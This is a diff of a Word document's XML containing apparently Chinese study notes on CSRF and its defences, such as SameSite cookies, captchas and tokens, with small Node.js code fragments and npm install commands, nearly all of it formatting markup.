+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'登录失败'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            });</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'登录失败'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>        }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:vertAlign w:val="baseline"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>    });</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="0"/>
+        <w:keepLines w:val="0"/>
+        <w:widowControl/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:suppressLineNumbers w:val="0"/>
+        <w:spacing w:before="53" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="1"/>
+        <w:ind w:leftChars="200"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="5269230" cy="1304925"/>
+            <wp:effectExtent l="0" t="0" r="7620" b="9525"/>
+            <wp:docPr id="6" name="图片 6"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="6" name="图片 6"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId22"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5269230" cy="1304925"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>WebInspect/other/csrf.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="2667000" cy="1304925"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="8" name="图片 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="8" name="图片 8"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2667000" cy="1304925"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>假如该网站禁止匿名用户，那么CSRF将完全被屏蔽。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>SameSite支持的浏览器</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> HYPERLINK "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie" </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="12"/>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="5269865" cy="2907030"/>
+            <wp:effectExtent l="0" t="0" r="6985" b="7620"/>
+            <wp:docPr id="7" name="图片 7"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="7" name="图片 7"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId24"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5269865" cy="2907030"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>（2）不访问A网站的前端</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·在前端页面加入验证信息；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·验证码；</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>·带token</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>npm install ccap --registry=http://registry.npm.taobao.org --save</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="default"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>npm install --global --production windows-build-tools</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
+            <wp:extent cx="5270500" cy="1422400"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
+            <wp:docPr id="10" name="图片 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="10" name="图片 10"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId25"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5270500" cy="1422400"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>报如上错误，需要使用管理员权限打开cmd终端。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>添加验证码工具类</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -12898,14 +14827,53 @@
               <w:rPr>
                 <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                 <w:b w:val="0"/>
-                <w:color w:val="6A9955"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>// 登录成功，设置cookie</w:t>
+                <w:color w:val="569CD6"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>var</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>captcha</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = {};</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -12925,175 +14893,6 @@
                 <w:szCs w:val="21"/>
               </w:rPr>
             </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>            </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>ctx</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="9CDCFE"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>cookies</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
-                <w:b w:val="0"/>
-                <w:color w:val="D4D4D4"/>
-                <w:kern w:val="0"/>
-                <w:sz w:val="21"/>
-                <w:szCs w:val="21"/>
-                <w:shd w:val="clear" w:fill="1E1E1E"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
-              </w:rPr>
-              <w:t>.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
